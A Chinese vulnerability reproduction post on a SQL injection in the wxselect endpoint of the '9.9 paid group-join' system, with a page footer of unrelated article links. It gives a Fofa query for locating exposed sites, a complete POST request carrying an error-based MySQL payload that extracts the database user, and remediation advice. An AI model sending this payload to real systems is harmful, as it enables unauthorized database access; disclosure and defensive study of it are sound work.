9.9付费进群系统 wxselect SQL注入漏洞复现

0x01 漏洞描述:

2024年9.9付费进群Plus版系统是一种新的社群管理方式,用户通过支付9.9元人民币即可加入特定的微信群,享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群,通过设置门槛来筛选成员,提高群组的专业性和互动质量。

在位于 /group/controller/Index.php 中的 wxselect 控制器通过input传入orderid 参数,并直接带入Where查询中,导致漏洞产生。

0x02 搜索语句:

Fofa:body="/website/index/login.html"

0x03 漏洞复现:

复制代码
POST /group/index/wxselect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,190))),5417)-- ylIU

获取当前用户如下

0x04 修复建议:

  1. 使用预编译语句:采用参数化查询和预编译语句(如Prepared Statements),可以确保输入数据作为参数处理,从而避免直接插入到SQL语句中。

  2. 输入验证:对用户输入进行严格验证,确保只接收合法范围内的数据。可以使用白名单策略,过滤掉所有非法字符。

  3. 最小权限原则:数据库账户应仅授予执行所需操作的最低权限,避免使用高权限账户连接数据库。

  4. 错误信息处理:避免在前端展示详细的数据库错误信息,以免泄露系统结构和数据库信息。

  5. 使用Web应用防火墙(WAF):部署WAF可以实时监测和拦截可疑请求,提供第一道防线。

相关推荐
zhu12893035562 小时前
网络安全的重要性与防护措施
网络·安全·web安全
渗透测试老鸟-九青2 小时前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链
网络研究院2 小时前
ChatGPT 的新图像生成器非常擅长伪造收据
网络·人工智能·安全·chatgpt·风险·技术·欺诈
写代码的小王吧3 小时前
【Java可执行命令】(十)JAR文件签名工具 jarsigner:通过数字签名及验证保证代码信任与安全,深入解析 Java的 jarsigner命令~
java·开发语言·网络·安全·web安全·网络安全·jar
夜风Sec5 小时前
Burp靶场 - HTTP走私请求【Part2】
安全
apcipot_rain6 小时前
【数据库原理及安全实验】实验一 数据库安装与创建
数据库·安全
爱上大树的小猪7 小时前
【前端安全】模板字符串动态拼接HTML的防XSS完全指南
前端·安全·html
独行soc7 小时前
2025年渗透测试面试题总结-某腾某讯-技术安全实习生升级(题目+回答)
java·python·安全·web安全·面试·职场和发展·红蓝攻防
蝎蟹居7 小时前
GB/T 4706.1-2024 家用和类似用途电器的安全 第1部分:通用要求 与2005版差异(1)
人工智能·单片机·嵌入式硬件·物联网·安全